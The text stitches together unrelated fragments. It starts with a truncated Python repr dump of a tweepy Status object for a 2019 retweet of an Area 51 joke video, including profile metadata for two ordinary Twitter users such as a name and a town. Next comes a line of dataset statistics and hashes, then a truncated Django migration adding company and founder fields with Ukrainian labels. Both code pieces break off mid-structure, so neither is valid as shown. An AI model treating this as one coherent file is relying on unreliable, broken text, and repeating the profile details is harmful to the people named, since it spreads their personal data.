'text': 'RT @Iesbianbecca: my alien after i rescue him from #Area51 https://t.co/2cpjcCexgg',
'truncated': False,
'entities': {
'hashtags': [{
'text': 'Area51',
'indices': [51, 58]
}],
'symbols': [],
'user_mentions': [{
'screen_name': 'Iesbianbecca',
'name': 'yung gravy’s pr manager',
'id': 1148054049884921856,
'id_str': '1148054049884921856',
'indices': [3, 16]
}],
'urls': [],
'media': [{
'id': 1149725663957573632,
'id_str': '1149725663957573632',
'indices': [59, 82],
'media_url': 'http://pbs.twimg.com/ext_tw_video_thumb/1149725663957573632/pu/img/H5tZVN-NafGEIuja.jpg',
'media_url_https': 'https://pbs.twimg.com/ext_tw_video_thumb/1149725663957573632/pu/img/H5tZVN-NafGEIuja.jpg',
'url': 'https://t.co/2cpjcCexgg',
'display_url': 'pic.twitter.com/2cpjcCexgg',
'expanded_url': 'https://twitter.com/Iesbianbecca/status/1149725895483154432/video/1',
'type': 'photo',
'sizes': {
'thumb': {
'w': 150,
'h': 150,
'resize': 'crop'
},
'small': {
'w': 680,
'h': 680,
'resize': 'fit'
},
'medium': {
'w': 720,
'h': 720,
'resize': 'fit'
},
'large': {
'w': 720,
'h': 720,
'resize': 'fit'
}
},
'source_status_id': 1149725895483154432,
'source_status_id_str': '1149725895483154432',
'source_user_id': 1148054049884921856,
'source_user_id_str': '1148054049884921856'
}]
},
'extended_entities': {
'media': [{
'id': 1149725663957573632,
'id_str': '1149725663957573632',
'indices': [59, 82],
'media_url': 'http://pbs.twimg.com/ext_tw_video_thumb/1149725663957573632/pu/img/H5tZVN-NafGEIuja.jpg',
'media_url_https': 'https://pbs.twimg.com/ext_tw_video_thumb/1149725663957573632/pu/img/H5tZVN-NafGEIuja.jpg',
'url': 'https://t.co/2cpjcCexgg',
'display_url': 'pic.twitter.com/2cpjcCexgg',
'expanded_url': 'https://twitter.com/Iesbianbecca/status/1149725895483154432/video/1',
'type': 'video',
'sizes': {
'thumb': {
'w': 150,
'h': 150,
'resize': 'crop'
},
'small': {
'w': 680,
'h': 680,
'resize': 'fit'
},
'medium': {
'w': 720,
'h': 720,
'resize': 'fit'
},
'large': {
'w': 720,
'h': 720,
'resize': 'fit'
}
},
'source_status_id': 1149725895483154432,
'source_status_id_str': '1149725895483154432',
'source_user_id': 1148054049884921856,
'source_user_id_str': '1148054049884921856',
'video_info': {
'aspect_ratio': [1, 1],
'duration_millis': 13000,
'variants': [{
'bitrate': 832000,
'content_type': 'video/mp4',
'url': 'https://video.twimg.com/ext_tw_video/1149725663957573632/pu/vid/480x480/iB0faFJ4tTnMTK3p.mp4?tag=10'
}, {
'bitrate': 432000,
'content_type': 'video/mp4',
'url': 'https://video.twimg.com/ext_tw_video/1149725663957573632/pu/vid/320x320/tIFHIqkUkl43zzRQ.mp4?tag=10'
}, {
'content_type': 'application/x-mpegURL',
'url': 'https://video.twimg.com/ext_tw_video/1149725663957573632/pu/pl/7f3FKQFqvkCIyBK-.m3u8?tag=10'
}, {
'bitrate': 1280000,
'content_type': 'video/mp4',
'url': 'https://video.twimg.com/ext_tw_video/1149725663957573632/pu/vid/720x720/yb_4FZmN-oJkFrDA.mp4?tag=10'
}]
},
'additional_media_info': {
'monetizable': False,
'source_user': {
'id': 1148054049884921856,
'id_str': '1148054049884921856',
'name': 'yung gravy’s pr manager',
'screen_name': 'Iesbianbecca',
'location': 'she/her',
'description': 'becca + kelly',
'url': None,
'entities': {
'description': {
'urls': []
}
},
'protected': False,
'followers_count': 48,
'friends_count': 52,
'listed_count': 0,
'created_at': 'Mon Jul 08 02:19:50 +0000 2019',
'favourites_count': 176,
'utc_offset': None,
'time_zone': None,
'geo_enabled': False,
'verified': False,
'statuses_count': 185,
'lang': None,
'contributors_enabled': False,
'is_translator': False,
'is_translation_enabled': False,
'profile_background_color': 'F5F8FA',
'profile_background_image_url': None,
'profile_background_image_url_https': None,
'profile_background_tile': False,
'profile_image_url': 'http://pbs.twimg.com/profile_images/1149741577583153152/nlrqvE20_normal.jpg',
'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1149741577583153152/nlrqvE20_normal.jpg',
'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1148054049884921856/1562951862',
'profile_link_color': '1DA1F2',
'profile_sidebar_border_color': 'C0DEED',
'profile_sidebar_fill_color': 'DDEEF6',
'profile_text_color': '333333',
'profile_use_background_image': True,
'has_extended_profile': True,
'default_profile': True,
'default_profile_image': False,
'following': False,
'follow_request_sent': False,
'notifications': False,
'translator_type': 'none'
}
}
}]
},
'metadata': {
'iso_language_code': 'en',
'result_type': 'recent'
},
'source': '<a href="http://twitter.com/download/iphone" rel="nofollow">Twitter for iPhone</a>',
'in_reply_to_status_id': None,
'in_reply_to_status_id_str': None,
'in_reply_to_user_id': None,
'in_reply_to_user_id_str': None,
'in_reply_to_screen_name': None,
'user': {
'id': 811843219315113984,
'id_str': '811843219315113984',
'name': 'sebastian ponce',
'screen_name': 'sebsss7',
'location': 'McAllen, TX',
'description': '',
'url': None,
'entities': {
'description': {
'urls': []
}
},
'protected': False,
'followers_count': 57,
'friends_count': 222,
'listed_count': 0,
'created_at': 'Thu Dec 22 07:58:01 +0000 2016',
'favourites_count': 1597,
'utc_offset': None,
'time_zone': None,
'geo_enabled': False,
'verified': False,
'statuses_count': 1017,
'lang': None,
'contributors_enabled': False,
'is_translator': False,
'is_translation_enabled': False,
'profile_background_color': 'F5F8FA',
'profile_background_image_url': None,
'profile_background_image_url_https': None,
'profile_background_tile': False,
'profile_image_url': 'http://pbs.twimg.com/profile_images/1148388633872875520/ySSTkr4Q_normal.jpg',
'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1148388633872875520/ySSTkr4Q_normal.jpg',
'profile_banner_url': 'https://pbs.twimg.com/profile_banners/811843219315113984/1562632232',
'profile_link_color': '1DA1F2',
'profile_sidebar_border_color': 'C0DEED',
'profile_sidebar_fill_color': 'DDEEF6',
'profile_text_color': '333333',
'profile_use_background_image': True,
'has_extended_profile': True,
'default_profile': True,
'default_profile_image': False,
'following': False,
'follow_request_sent': False,
'notifications': False,
'translator_type': 'none'
},
'geo': None,
'coordinates': None,
'place': None,
'contributors': None,
'retweeted_status': {
'created_at': 'Fri Jul 12 17:03:09 +0000 2019',
'id': 1149725895483154432,
'id_str': '1149725895483154432',
'text': 'my alien after i rescue him from #Area51 https://t.co/2cpjcCexgg',
'truncated': False,
'entities': {
'hashtags': [{
'text': 'Area51',
'indices': [33, 40]
}],
'symbols': [],
'user_mentions': [],
'urls': [],
'media': [{
'id': 1149725663957573632,
'id_str': '1149725663957573632',
'indices': [41, 64],
'media_url': 'http://pbs.twimg.com/ext_tw_video_thumb/1149725663957573632/pu/img/H5tZVN-NafGEIuja.jpg',
'media_url_https': 'https://pbs.twimg.com/ext_tw_video_thumb/1149725663957573632/pu/img/H5tZVN-NafGEIuja.jpg',
'url': 'https://t.co/2cpjcCexgg',
'display_url': 'pic.twitter.com/2cpjcCexgg',
'expanded_url': 'https://twitter.com/Iesbianbecca/status/1149725895483154432/video/1',
'type': 'photo',
'sizes': {
'thumb': {
'w': 150,
'h': 150,
'resize': 'crop'
},
'small': {
'w': 680,
'h': 680,
'resize': 'fit'
},
'medium': {
'w': 720,
'h': 720,
'resize': 'fit'
},
'large': {
'w': 720,
'h': 720,
'resize': 'fit'
}
}
}]
},
'extended_entities': {
'media': [{
'id': 1149725663957573632,
'id_str': '1149725663957573632',
'indices': [41, 64],
'media_url': 'http://pbs.twimg.com/ext_tw_video_thumb/1149725663957573632/pu/img/H5tZVN-NafGEIuja.jpg',
'media_url_https': 'https://pbs.twimg.com/ext_tw_video_thumb/1149725663957573632/pu/img/H5tZVN-NafGEIuja.jpg',
'url': 'https://t.co/2cpjcCexgg',
'display_url': 'pic.twitter.com/2cpjcCexgg',
'expanded_url': 'https://twitter.com/Iesbianbecca/status/1149725895483154432/video/1',
'type': 'video',
'sizes': {
'thumb': {
'w': 150,
'h': 150,
'resize': 'crop'
},
'small': {
'w': 680,
'h': 680,
'resize': 'fit'
},
'medium': {
'w': 720,
'h': 720,
'resize': 'fit'
},
'large': {
'w': 720,
'h': 720,
'resize': 'fit'
}
},
'video_info': {
'aspect_ratio': [1, 1],
'duration_millis': 13000,
'variants': [{
'bitrate': 832000,
'content_type': 'video/mp4',
'url': 'https://video.twimg.com/ext_tw_video/1149725663957573632/pu/vid/480x480/iB0faFJ4tTnMTK3p.mp4?tag=10'
}, {
'bitrate': 432000,
'content_type': 'video/mp4',
'url': 'https://video.twimg.com/ext_tw_video/1149725663957573632/pu/vid/320x320/tIFHIqkUkl43zzRQ.mp4?tag=10'
}, {
'content_type': 'application/x-mpegURL',
'url': 'https://video.twimg.com/ext_tw_video/1149725663957573632/pu/pl/7f3FKQFqvkCIyBK-.m3u8?tag=10'
}, {
'bitrate': 1280000,
'content_type': 'video/mp4',
'url': 'https://video.twimg.com/ext_tw_video/1149725663957573632/pu/vid/720x720/yb_4FZmN-oJkFrDA.mp4?tag=10'
}]
},
'additional_media_info': {
'monetizable': False
}
}]
},
'metadata': {
'iso_language_code': 'en',
'result_type': 'recent'
},
'source': '<a href="http://twitter.com/download/iphone" rel="nofollow">Twitter for iPhone</a>',
'in_reply_to_status_id': None,
'in_reply_to_status_id_str': None,
'in_reply_to_user_id': None,
'in_reply_to_user_id_str': None,
'in_reply_to_screen_name': None,
'user': {
'id': 1148054049884921856,
'id_str': '1148054049884921856',
'name': 'yung gravy’s pr manager',
'screen_name': 'Iesbianbecca',
'location': 'she/her',
'description': 'becca + kelly',
'url': None,
'entities': {
'description': {
'urls': []
}
},
'protected': False,
'followers_count': 48,
'friends_count': 52,
'listed_count': 0,
'created_at': 'Mon Jul 08 02:19:50 +0000 2019',
'favourites_count': 176,
'utc_offset': None,
'time_zone': None,
'geo_enabled': False,
'verified': False,
'statuses_count': 185,
'lang': None,
'contributors_enabled': False,
'is_translator': False,
'is_translation_enabled': False,
'profile_background_color': 'F5F8FA',
'profile_background_image_url': None,
'profile_background_image_url_https': None,
'profile_background_tile': False,
'profile_image_url': 'http://pbs.twimg.com/profile_images/1149741577583153152/nlrqvE20_normal.jpg',
'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1149741577583153152/nlrqvE20_normal.jpg',
'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1148054049884921856/1562951862',
'profile_link_color': '1DA1F2',
'profile_sidebar_border_color': 'C0DEED',
'profile_sidebar_fill_color': 'DDEEF6',
'profile_text_color': '333333',
'profile_use_background_image': True,
'has_extended_profile': True,
'default_profile': True,
'default_profile_image': False,
'following': False,
'follow_request_sent': False,
'notifications': False,
'translator_type': 'none'
},
'geo': None,
'coordinates': None,
'place': None,
'contributors': None,
'is_quote_status': False,
'retweet_count': 8853,
'favorite_count': 22422,
'favorited': False,
'retweeted': False,
'possibly_sensitive': False,
'lang': 'en'
},
'is_quote_status': False,
'retweet_count': 8853,
'favorite_count': 0,
'favorited': False,
'retweeted': False,
'possibly_sensitive': False,
'lang': 'en'
}, created_at = datetime.datetime(2019, 7, 12, 22, 13, 55), id = 1149804105717731330, id_str = '1149804105717731330', text = 'RT @Iesbianbecca: my alien after i rescue him from #Area51 https://t.co/2cpjcCexgg', truncated = False, entities = {
'hashtags': [{
'text': 'Area51',
'indices': [51, 58]
}],
'symbols': [],
'user_mentions': [{
'screen_name': 'Iesbianbecca',
'name': 'yung gravy’s pr manager',
'id': 1148054049884921856,
'id_str': '1148054049884921856',
'indices': [3, 16]
}],
'urls': [],
'media': [{
'id': 1149725663957573632,
'id_str': '1149725663957573632',
'indices': [59, 82],
'media_url': 'http://pbs.twimg.com/ext_tw_video_thumb/1149725663957573632/pu/img/H5tZVN-NafGEIuja.jpg',
'media_url_https': 'https://pbs.twimg.com/ext_tw_video_thumb/1149725663957573632/pu/img/H5tZVN-NafGEIuja.jpg',
'url': 'https://t.co/2cpjcCexgg',
'display_url': 'pic.twitter.com/2cpjcCexgg',
'expanded_url': 'https://twitter.com/Iesbianbecca/status/1149725895483154432/video/1',
'type': 'photo',
'sizes': {
'thumb': {
'w': 150,
'h': 150,
'resize': 'crop'
},
'small': {
'w': 680,
'h': 680,
'resize': 'fit'
},
'medium': {
'w': 720,
'h': 720,
'resize': 'fit'
},
'large': {
'w': 720,
'h': 720,
'resize': 'fit'
}
},
'source_status_id': 1149725895483154432,
'source_status_id_str': '1149725895483154432',
'source_user_id': 1148054049884921856,
'source_user_id_str': '1148054049884921856'
}]
}, extended_entities = {
'media': [{
'id': 1149725663957573632,
'id_str': '1149725663957573632',
'indices': [59, 82],
'media_url': 'http://pbs.twimg.com/ext_tw_video_thumb/1149725663957573632/pu/img/H5tZVN-NafGEIuja.jpg',
'media_url_https': 'https://pbs.twimg.com/ext_tw_video_thumb/1149725663957573632/pu/img/H5tZVN-NafGEIuja.jpg',
'url': 'https://t.co/2cpjcCexgg',
'display_url': 'pic.twitter.com/2cpjcCexgg',
'expanded_url': 'https://twitter.com/Iesbianbecca/status/1149725895483154432/video/1',
'type': 'video',
'sizes': {
'thumb': {
'w': 150,
'h': 150,
'resize': 'crop'
},
'small': {
'w': 680,
'h': 680,
'resize': 'fit'
},
'medium': {
'w': 720,
'h': 720,
'resize': 'fit'
},
'large': {
'w': 720,
'h': 720,
'resize': 'fit'
}
},
'source_status_id': 1149725895483154432,
'source_status_id_str': '1149725895483154432',
'source_user_id': 1148054049884921856,
'source_user_id_str': '1148054049884921856',
'video_info': {
'aspect_ratio': [1, 1],
'duration_millis': 13000,
'variants': [{
'bitrate': 832000,
'content_type': 'video/mp4',
'url': 'https://video.twimg.com/ext_tw_video/1149725663957573632/pu/vid/480x480/iB0faFJ4tTnMTK3p.mp4?tag=10'
}, {
'bitrate': 432000,
'content_type': 'video/mp4',
'url': 'https://video.twimg.com/ext_tw_video/1149725663957573632/pu/vid/320x320/tIFHIqkUkl43zzRQ.mp4?tag=10'
}, {
'content_type': 'application/x-mpegURL',
'url': 'https://video.twimg.com/ext_tw_video/1149725663957573632/pu/pl/7f3FKQFqvkCIyBK-.m3u8?tag=10'
}, {
'bitrate': 1280000,
'content_type': 'video/mp4',
'url': 'https://video.twimg.com/ext_tw_video/1149725663957573632/pu/vid/720x720/yb_4FZmN-oJkFrDA.mp4?tag=10'
}]
},
'additional_media_info': {
'monetizable': False,
'source_user': {
'id': 1148054049884921856,
'id_str': '1148054049884921856',
'name': 'yung gravy’s pr manager',
'screen_name': 'Iesbianbecca',
'location': 'she/her',
'description': 'becca + kelly',
'url': None,
'entities': {
'description': {
'urls': []
}
},
'protected': False,
'followers_count': 48,
'friends_count': 52,
'listed_count': 0,
'created_at': 'Mon Jul 08 02:19:50 +0000 2019',
'favourites_count': 176,
'utc_offset': None,
'time_zone': None,
'geo_enabled': False,
'verified': False,
'statuses_count': 185,
'lang': None,
'contributors_enabled': False,
'is_translator': False,
'is_translation_enabled': False,
'profile_background_color': 'F5F8FA',
'profile_background_image_url': None,
'profile_background_image_url_https': None,
'profile_background_tile': False,
'profile_image_url': 'http://pbs.twimg.com/profile_images/1149741577583153152/nlrqvE20_normal.jpg',
'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1149741577583153152/nlrqvE20_normal.jpg',
'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1148054049884921856/1562951862',
'profile_link_color': '1DA1F2',
'profile_sidebar_border_color': 'C0DEED',
'profile_sidebar_fill_color': 'DDEEF6',
'profile_text_color': '333333',
'profile_use_background_image': True,
'has_extended_profile': True,
'default_profile': True,
'default_profile_image': False,
'following': False,
'follow_request_sent': False,
'notifications': False,
'translator_type': 'none'
}
}
}]
}, metadata = {
'iso_language_code': 'en',
'result_type': 'recent'
}, source = 'Twitter for iPhone', source_url = 'http://twitter.com/download/iphone', in_reply_to_status_id = None, in_reply_to_status_id_str = None, in_reply_to_user_id = None, in_reply_to_user_id_str = None, in_reply_to_screen_name = None, author = User(_api = < tweepy.api.API object at 0x000001CE1B31E198 > , _json = {
'id': 811843219315113984,
'id_str': '811843219315113984',
'name': 'sebastian ponce',
'screen_name': 'sebsss7',
'location': 'McAllen, TX',
'description': '',
'url': None,
'entities': {
'description': {
'urls': []
}
},
'protected': False,
'followers_count': 57,
'friends_count': 222,
'listed_count': 0,
'created_at': 'Thu Dec 22 07:58:01 +0000 2016',
'favourites_count': 1597,
'utc_offset': None,
'time_zone': None,
'geo_enabled': False,
'verified': False,
'statuses_count': 1017,
'lang': None,
'contributors_enabled': False,
'is_translator': False,
'is_translation_enabled': False,
'profile_background_color': 'F5F8FA',
'profile_background_image_url': None,
'profile_background_image_url_https': None,
'profile_background_tile': False,
'profile_image_url': 'http://pbs.twimg.com/profile_images/1148388633872875520/ySSTkr4Q_normal.jpg',
'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1148388633872875520/ySSTkr4Q_normal.jpg',
'profile_banner_url': 'https://pbs.twimg.com/profile_banners/811843219315113984/1562632232',
'profile_link_color': '1DA1F2',
'profile_sidebar_border_color': 'C0DEED',
'profile_sidebar_fill_color': 'DDEEF6',
'profile_text_color': '333333',
'profile_use_background_image': True,
'has_extended_profile': True,
'default_profile': True,
'default_profile_image': False,
'following': False,
'follow_request_sent': False,
'notifications': False,
'translator_type': 'none'
}, id = 811843219315113984, id_str = '811843219315113984', name = 'sebastian ponce', screen_name = 'sebsss7', location = 'McAllen, TX', description = '', url = None, entities = {
'description': {
'urls': []
}
}, protected = False, followers_count = 57, friends_count = 222, listed_count = 0, created_at = datetime.datetime(2016, 12, 22, 7, 58, 1), favourites_count = 1597, utc_offset = None, time_zone = None, geo_enabled = False, verified = False, statuses_count = 1017, lang = None, contributors_enabled = False, is_translator = False, is_translation_enabled = False, profile_background_color = 'F5F8FA', profile_background_image_url = None, profile_background_image_url_https = None, profile_background_tile = False, profile_image_url = 'http://pbs.twimg.com/profile_images/1148388633872875520/ySSTkr4Q_normal.jpg', profile_image_url_https = 'https://pbs.twimg.com/profile_images/1148388633872875520/ySSTkr4Q_normal.jpg', profile_banner_url = 'https://pbs.twimg.com/profile_banners/811843219315113984/1562632232', profile_link_color = '1DA1F2', profile_sidebar_border_color = 'C0DEED', profile_sidebar_fill_color = 'DDEEF6', profile_text_color = '333333', profile_use_background_image = True, has_extended_profile = True, default_profile = True, default_profile_image = False, following = False, follow_request_sent = False, notifications = False, translator_type = 'none'), user = User(_api = < tweepy.api.API object at 0x000001CE1B31E198 > , _json = {
'id': 811843219315113984,
'id_str': '811843219315113984',
'name': 'sebastian ponce',
'screen_name': 'sebsss7',
'location': 'McAllen, TX',
'description': '',
'url': None,
'entities': {
'description': {
'urls': []
}
},
'protected': False,
'followers_count': 57,
'friends_count': 222,
'listed_count': 0,
'created_at': 'Thu Dec 22 07:58:01 +0000 2016',
'favourites_count': 1597,
'utc_offset': None,
'time_zone': None,
'geo_enabled': False,
'verified': False,
'statuses_count': 1017,
'lang': None,
'contributors_enabled': False,
'is_translator': False,
'is_translation_enabled': False,
'profile_background_color': 'F5F8FA',
'profile_background_image_url': None,
'profile_background_image_url_https': None,
'profile_background_tile': False,
'profile_image_url': 'http://pbs.twimg.com/profile_images/1148388633872875520/ySSTkr4Q_normal.jpg',
'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1148388633872875520/ySSTkr4Q_normal.jpg',
'profile_banner_url': 'https://pbs.twimg.com/profile_banners/811843219315113984/1562632232',
'profile_link_color': '1DA1F2',
'profile_sidebar_border_color': 'C0DEED',
'profile_sidebar_fill_color': 'DDEEF6',
'profile_text_color': '333333',
'profile_use_background_image': True,
'has_extended_profile': True,
'default_profile': True,
'default_profile_image': False,
'following': False,
'follow_request_sent': False,
'notifications': False,
'translator_type': 'none'
}, id = 811843219315113984, id_str = '811843219315113984', name = 'sebastian ponce', screen_name = 'sebsss7', location = 'McAllen, TX', description = '', url = None, entities = {
'description': {
'urls': []
}
}, protected = False, followers_count = 57, friends_count = 222, listed_count = 0, created_at = datetime.datetime(2016, 12, 22, 7, 58, 1), favourites_count = 1597, utc_offset = None, time_zone = None, geo_enabled = False, verified = False, statuses_count = 1017, lang = None, contributors_enabled = False, is_translator = False, is_translation_enabled = False, profile_background_color = 'F5F8FA', profile_background_image_url = None, profile_background_image_url_https = None, profile_background_tile = False, profile_image_url = 'http://pbs.twimg.com/profile_images/1148388633872875520/ySSTkr4Q_normal.jpg', profile_image_url_https = 'https://pbs.twimg.com/profile_images/1148388633872875520/ySSTkr4Q_normal.jpg', profile_banner_url = 'https://pbs.twimg.com/profile_banners/811843219315113984/1562632232', profile_link_color = '1DA1F2', profile_sidebar_border_color = 'C0DEED', profile_sidebar_fill_color = 'DDEEF6', profile_text_color = '333333', profile_use_background_image = True, has_extended_profile = True, default_profile = True, default_profile_image = False, following = False, follow_request_sent = False, notifications = False, translator_type = 'none'), geo = None, coordinates = None, place = None, contributors = None, retweeted_status = Status(_api = < tweepy.api.API object at 0x000001CE1B31E198 > , _json = {
'created_at': 'Fri Jul 12 17:03:09 +0000 2019',
'id': 1149725895483154432,
'id_str': '1149725895483154432',
'text': 'my alien after i rescue him from #Area51 https://t.co/2cpjcCexgg',
'truncated': False,
'entities': {
'hashtags': [{
'text': 'Area51',
'indices': [33, 40]
}],
'symbols': [],
'user_mentions': [],
'urls': [],
'media': [{
'id': 1149725663957573632,
'id_str': '1149725663957573632',
'indices': [41, 64],
'media_url': 'http://pbs.twimg.com/ext_tw_video_thumb/1149725663957573632/pu/img/H5tZVN-NafGEIuja.jpg',
'media_url_https': 'https://pbs.twimg.com/ext_tw_video_thumb/1149725663957573632/pu/img/H5tZVN-NafGEIuja.jpg',
'url': 'https://t.co/2cpjcCexgg',
'display_url': 'pic.twitter.com/2cpjcCexgg',
'expanded_url': 'https://twitter.com/Iesbianbecca/status/1149725895483154432/video/1',
'type': 'photo',
'sizes': {
'thumb': {
'w': 150,
'h': 150,
'resize': 'crop'
},
'small': {
'w': 680,
'h': 680,
'resize': 'fit'
},
'medium': {
'w': 720,
'h': 720,
'resize': 'fit'
},
'large': {
'w': 720,
'h': 720,
'resize': 'fit'
}
}
}]
},
'extended_entities': {
'media': [{
'id': 1149725663957573632,
'id_str': '1149725663957573632',
'indices': [41, 64],
'media_url': 'http://pbs.twimg.com/ext_tw_video_thumb/1149725663957573632/pu/img/H5tZVN-NafGEIuja.jpg',
'media_url_https': 'https://pbs.twimg.com/ext_tw_video_thumb/1149725663957573632/pu/img/H5tZVN-NafGEIuja.jpg',
'url': 'https://t.co/2cpjcCexgg',
'display_url': 'pic.twitter.com/2cpjcCexgg',
'expanded_url': 'https://twitter.com/Iesbianbecca/status/1149725895483154432/video/1',
'type': 'video',
'sizes': {
'thumb': {
'w': 150,
'h': 150,
'resize': 'crop'
},
'small': {
'w': 680,
'h': 680,
'resize': 'fit'
},
'medium': {
'w': 720,
'h': 720,
'resize': 'fit'
},
'large': {
'w': 720,
'h': 720,
'resize': 'fit'
}
},
'video_info': {
'aspect_ratio': [1, 1],
'duration_millis': 13000,
'variants': [{
'bitrate': 832000,
'content_type': 'video/mp4',
'url': 'https://video.twimg.com/ext_tw_video/1149725663957573632/pu/vid/480x480/iB0faFJ4tTnMTK3p.mp4?tag=10'
}, {
'bitrate': 432000,
'content_type': 'video/mp4',
'url': 'https://video.twimg.com/ext_tw_video/1149725663957573632/pu/vid/320x320/tIFHIqkUkl43zzRQ.mp4?tag=10'
}, {
'content_type': 'application/x-mpegURL',
'url': 'https://video.twimg.com/ext_tw_video/1149725663957573632/pu/pl/7f3FKQFqvkCIyBK-.m3u8?tag=10'
}, {
'bitrate': 1280000,
'content_type': 'video/mp4',
'url': 'https://video.twimg.com/ext_tw_video/1149725663957573632/pu/vid/720x720/yb_4FZmN-oJkFrDA.mp4?tag=10'
}]
},
'additional_media_info': {
'monetizable': False
}
}]
},
'metadata': {
'iso_language_code': 'en',
'result_type': 'recent'
},
'source': '<a href="http://twitter.com/download/iphone" rel="nofollow">Twitter for iPhone</a>',
'in_reply_to_status_id': None,
'in_reply_to_status_id_str': None,
'in_reply_to_user_id': None,
'in_reply_to_user_id_str': None,
'in_reply_to_screen_name': None,
'user': {
'id': 1148054049884921856,
'id_str': '1148054049884921856',
'name': 'yung gravy’s pr manager',
'screen_name': 'Iesbianbecca',
'location': 'she/her',
'description': 'becca + kelly',
'url': None,
'entities': {
'description': {
'urls': []
}
},
'protected': False,
'followers_count': 48,
'friends_count': 52,
'listed_count': 0,
'created_at': 'Mon Jul 08 02:19:50 +0000 2019',
'favourites_count': 176,
'utc_offset': None,
'time_zone': None,
'geo_enabled': False,
'verified': False,
'statuses_count': 185,
'lang': None,
'contributors_enabled': False,
'is_translator': False,
'is_translation_enabled': False,
'profile_background_color': 'F5F8FA',
'profile_background_image_url': None,
'profile_background_image_url_https': None,
'profile_background_tile': False,
'profile_image_url': 'http://pbs.twimg.com/profile_images/1149741577583153152/nlrqvE20_normal.jpg',
'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1149741577583153152/nlrqvE20_normal.jpg',
'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1148054049884921856/1562951862',
'profile_link_color': '1DA1F2',
'profile_sidebar_border_color': 'C0DEED',
'profile_sidebar_fill_color': 'DDEEF6',
'profile_text_color': '333333',
'profile_use_background_image': True,
'has_extended_profile': True,
'default_profile': True,
'default_profile_image': False,
'following': False,
'follow_request_sent': False,
'notifications': False,
'translator_type': 'none'
},
'geo': None,
'coordinates': None,
'place': None,
'contributors': None,
'is_quote_status': False,
'retweet_count': 8853,
'favorite_count': 22422,
'favorited': False,
'retweeted': False,
'possibly_sensitive': False,
'lang': 'en'
}, created_at = datetime.datetime(2019, 7, 12, 17, 3, 9), id = 1149725895483154432, id_str = '1149725895483154432', text = 'my alien after i rescue him from #Area51 https://t.co/2cpjcCexgg', truncated = False, entities = {
'hashtags': [{
'text': 'Area51',
'indices': [33, 40]
}],
'symbols': [],
'user_mentions': [],
'urls': [],
'media': [{
'id': 1149725663957573632,
'id_str': '1149725663957573632',
'indices': [41, 64],
'media_url': 'http://pbs.twimg.com/ext_tw_video_thumb/1149725663957573632/pu/img/H5tZVN-NafGEIuja.jpg',
'media_url_https': 'https://pbs.twimg.com/ext_tw_video_thumb/1149725663957573632/pu/img/H5tZVN-NafGEIuja.jpg',
'url': 'https://t.co/2cpjcCexgg',
'display_url': 'pic.twitter.com/2cpjcCexgg',
'expanded_url': 'https://twitter.com/Iesbianbecca/status/1149725895483154432/video/1',
'type': 'photo',
'sizes': {
'thumb': {
'w': 150,
'h': 150,
'resize': 'crop'
},
'small': {
'w': 680,
'h': 680,
'resize': 'fit'
},
'medium': {
'w': 720,
'h': 720,
'resize': 'fit'
},
'large': {
'w': 720,
'h': 720,
'resize': 'fit'
}
}
}]
}, extended_entities = {
'media': [{
'id': 1149725663957573632,
'id_str': '1149725663957573632',
'indices': [41, 64],
'media_url': 'http://pbs.twimg.com/ext_tw_video_thumb/1149725663957573632/pu/img/H5tZVN-NafGEIuja.jpg',
'media_url_https': 'https://pbs.twimg.com/ext_tw_video_thumb/1149725663957573632/pu/img/H5tZVN-NafGEIuja.jpg',
'url': 'https://t.co/2cpjcCexgg',
'display_url': 'pic.twitter.com/2cpjcCexgg',
'expanded_url': 'https://twitter.com/Iesbianbecca/status/1149725895483154432/video/1',
'type': 'video',
'sizes': {
'thumb': {
'w': 150,
'h': 150,
'resize': 'crop'
},
'small': {
'w': 680,
'h': 680,
'resize': 'fit'
},
'medium': {
'w': 720,
'h': 720,
'resize': 'fit'
},
'large': {
'w': 720,
'h': 720,
'resize': 'fit'
}
},
'video_info': {
'aspect_ratio': [1, 1] | 55.290598 | 1,340 | 0.394207 | 3,616 | 51,752 | 5.388274 | 0.071073 | 0.029973 | 0.026535 | 0.02402 | 0.994508 | 0.993071 | 0.993071 | 0.993071 | 0.993071 | 0.990659 | 0 | 0.153332 | 0.500077 | 51,752 | 936 | 1,341 | 55.290598 | 0.59976 | 0 | 0 | 0.889128 | 0 | 0.041981 | 0.336379 | 0.049733 | 0 | 0 | 0.001394 | 0 | 0 | 0 | null | null | 0 | 0 | null | null | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 10 |
99275f5e251f9df8c85e594278f0529ecab6c0fa | 3,987 | py | Python | business_register/migrations/0047_auto_20201112_1914.py | OlexandrTopuzov/Data_converter | 0ac2319ccaae790af35ab2202724c65d83d32ecc | [
"MIT"
] | null | null | null | business_register/migrations/0047_auto_20201112_1914.py | OlexandrTopuzov/Data_converter | 0ac2319ccaae790af35ab2202724c65d83d32ecc | [
"MIT"
] | null | null | null | business_register/migrations/0047_auto_20201112_1914.py | OlexandrTopuzov/Data_converter | 0ac2319ccaae790af35ab2202724c65d83d32ecc | [
"MIT"
] | null | null | null | # Generated by Django 3.0.7 on 2020-11-12 19:14
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('business_register', '0046_auto_20201029_1328'),
]
operations = [
migrations.AddField(
model_name='company',
name='boss',
field=models.CharField(blank=True, default='', max_length=100, null=True, verbose_name='керівник'),
),
migrations.AddField(
model_name='founder',
name='is_beneficiary',
field=models.BooleanField(blank=True, default=False, verbose_name='є бенефіціаром'),
),
migrations.AddField(
model_name='founder',
name='is_founder',
field=models.BooleanField(blank=True, default=False, verbose_name='є офіційним засновником'),
),
migrations.AddField(
model_name='historicalcompany',
name='boss',
field=models.CharField(blank=True, default='', max_length=100, null=True, verbose_name='керівник'),
),
migrations.AddField(
model_name='historicalfounder',
